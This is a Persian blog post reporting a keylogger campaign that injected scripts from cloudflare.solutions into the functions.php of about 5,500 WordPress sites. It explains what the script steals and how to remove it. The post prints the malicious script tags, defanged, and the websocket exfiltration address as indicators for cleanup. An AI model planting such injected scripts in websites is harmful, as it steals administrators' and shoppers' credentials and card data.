۵۵۰۰ سایت وردپرسی در معرض خطر

با عرض سلام خدمت دوستان گرامی؛ این خبر تا حدودی حساس می باشد و برای همین این خبر رو اینجا براتون می زارم و امیدوارم که هیچکس به این ویروس آلوده نشه اگرچه همیشه ویروس هست و همیشه راه حلی هم وجود دارد

تاریخ خبر   دوشنبه ۲۷ آذر ۹۶

یکی از سیستم‌های مدیریت محتوای معروف و کاربردی، سیستم مدیریت محتوای ورد پرس است که البته کاملاً رایگان و اپن سورس (Open Source) است. ورد پرس توسط زبان محبوب PHP نوشته شده و از قدرت MySQL بهره می‌برد.

اما اخیراً مسئله نگران‌کننده‌ای پیش آمده است. در حال حاضر حدود ۵۵۰۰ سایت اینترنتی که از سیستم مدیریت محتوای ورد پرس استفاده می‌کنند به یک کد اسکریپت (Script) مخرب آلوده شده‌اند که با دامنه cloudflare.solutions کار می‌کند اما این اسکریپت (Script) هیچ ارتباطی با CDN معروف CloudFlare ندارد. بنا به گزارشی بیشتر وب‌سایت‌های آلوده شده از طریق این اسکریپت در الکسا رنکی بالای ۲۰۰۰۰۰ دارند و داده‌های دزدیده شده از این وب‌سایت‌ها به‌واسطه این اسکریپت مخرب، به آدرس /wss://cloudflare[.]solutions:8085 فرستاده می‌شوند.

این اسکریپت (Script) مخرب از keyLogger بهره می‌برد. keyLogger در دو نوع نرم‌افزاری و سخت‌افزاری وجود دارد. در این مورد قطعه کدی نرم‌افزاری است که کلیدهای فشرده‌شده توسط کاربر را ذخیره می‌کند و برای هکر ارسال می‌کند.

متأسفانه این اسکریپت مخرب در هر دو بخش فرانت‌اند (Frontend) و بک‌اند (Backend) سایت‌های قربانی اجرا می‌شود بنابراین به‌راحتی می‌تواند نام کاربری و رمز عبور مدیر وب‌سایت را هنگام ورود به پنل مدیریت به دست آورده و به این پنل دسترسی داشته باشد.

این اسکریپت درصورتی‌که بتواند در فرانت‌اند (frontend) سایت قربانی اجرا شود هم بسیار خطرناک است. در این حالت اسکریپت مخرب به‌راحتی می‌تواند اطلاعاتی که کاربران در فیلدهای comment وارد می‌کنند را ذخیره کرده و اطلاعات آن‌ها را به سرقت ببرد.

این اسکریپت درصورتی‌که روی یک وب‌سایت فروشگاه آنلاین بارگذاری شود و این چنین وب‌سایتی را آلوده کند می‌تواند اطلاعات حساس کاربران همچون اطلاعات کارت بانکی و رمز عبور آن‌ها را به دست بیاورد.

نکته کلیدی در مورد این اسکریپت مخرب قرار گرفتن در فایل اصلی function.php است، فایل استانداردی که در تمام تم‌های ورد پرس موجود است. وجود کد مخرب در این فایل باعث می‌شود که کد مخرب به‌راحتی بتواند روی انواع مرورگرهای قربانیان اجرا شود.

جالب اینجاست که این نمونه اسکریپت از دقیقاً همین دامنه اصلاً تازگی ندارد و این سومین باری است که دامنه cloudflare.solutions اسکریپتی مخرب وب‌سایت‌ها را آلوده می‌کند. حمله اول مربوط به ماه آوریل است که طی این حمله هکرها توانستند به سایت‌های تبلیغاتی نفوذ کرده و اسکریپت خود را پشت بنرهای تبلیغاتی قرار دهند.

حمله دوم در ماه نوامبر اتفاق افتاد. هکرها در این حمله کد اسکریپتی شبیه به ساختار گوگل آنالیتیکز (Google Analytics) نوشته بودند. این کد و حمله که Coinhive نام داشت از منابع سخت‌افزاری سیستم قربانیان برای به دست آوردن بیت کوین استفاده می‌کرد. این کد مخرب توانست بیشتر از ۱۸۳۳ سایت را آلوده کند.

راه‌حل مقابله با اسکریپت مخرب در ورد پرس

همان‌طور که گفته شد اسکریپت مخرب در فایل function.php قرار گرفته است و این کد به‌صورت زیر است:

< script type=’text/javascript’ src=’hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js’ >< /script >< script type=’text/javascript’ src=’hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js’ >< /script >

به گفته محققان امنیت سایبری کمپانی Sucuri، وب‌سایت‌های آلوده شده به این اسکریپت به‌راحتی می‌توانند با جستجوی اسکریپت‌های فوق در فایل function.php در WordPress theme و حذف آن، از سرقت اطلاعات مهم مدیر وب‌سایت و کاربران جلوگیری کنند.

منبع فیسنما

درباره علی جعفری

سلام به همه ی هم محله ایها. نام من علی جعفری است ساکن شهر شیراز متولد یازده دی 1379. من عاشق کامپیوتر و ورزش هستم و به ورزش هم علاقه دارم ورزشهایی مانند: جودو, فوتبال, «در ضمن باید بگم که من پرسپلیسی هستم» و همچنین برنامه نویسی رو هم دوست دارم راه های ارتباطی من اسکایپ ali.jafari1705 میباشد
این نوشته در اخبار, اطلاع رسانی, کامپیوتر ارسال و , , برچسب شده است. افزودن پیوند یکتا به علاقه‌مندی‌ها.

3 پاسخ به ۵۵۰۰ سایت وردپرسی در معرض خطر

  1. 1
    بیسایه بیسایه says:

    سلام مرسی

  2. 2
    گوشه نشین says:

    سلام و تشکر از اطلاع رسانی شما موفق باشید ..

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *